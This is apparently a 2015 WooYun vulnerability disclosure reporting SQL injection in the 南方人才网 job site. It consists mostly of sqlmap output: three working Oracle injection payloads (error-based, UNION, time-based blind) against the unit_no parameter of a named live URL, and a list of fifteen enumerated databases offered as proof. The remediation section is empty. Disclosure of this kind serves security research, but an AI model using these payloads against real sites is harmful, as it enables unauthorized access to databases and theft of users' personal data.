
An Oracle SQL injection vulnerability in 南方人才网

2015-02-09 01:40

Code block:
Place: GET
Parameter: unit_no

Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
Payload: unit_no=381312002' AND 7892=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(121)||CHR(121)||CHR(118)||CHR(58)||(SELECT (CASE WHEN (7892=7892) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(104)||CHR(112)||CHR(113)||CHR(58)||CHR(62))) FROM DUAL) AND 'hpsA'='hpsA

Type: UNION query
Title: Generic UNION query (NULL) - 6 columns
Payload: unit_no=381312002' UNION ALL SELECT NULL,CHR(58)||CHR(121)||CHR(121)||CHR(118)||CHR(58)||CHR(108)||CHR(111)||CHR(74)||CHR(75)||CHR(103)||CHR(102)||CHR(76)||CHR(72)||CHR(65)||CHR(120)||CHR(58)||CHR(104)||CHR(112)||CHR(113)||CHR(58),NULL,NULL,NULL,NULL FROM DUAL--

Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: unit_no=381312002' AND 1616=DBMS_PIPE.RECEIVE_MESSAGE(CHR(82)||CHR(100)||CHR(87)||CHR(105),5) AND 'UlJq'='UlJq
---
[22:19:20] [INFO] the back-end DBMS is Oracle
web application technology: JSP
back-end DBMS: Oracle

Proof of vulnerability:

Code block:
available databases [15]:
[*] BBS
[*] CORE
[*] DBSNMP
[*] GZZP
[*] IPTV
[*] NFRC
[*] OEM_JOB168_CPXT
[*] OUTLN
[*] PERFSTAT
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TEST
[*] TSMSYS
[*] WMSYS

Code block:
www.job168.com/english/person/etcpos.jsp?unit_no=381312002

Remediation:


Source: www.wooyun.org/bugs/wooyun-2015-088502
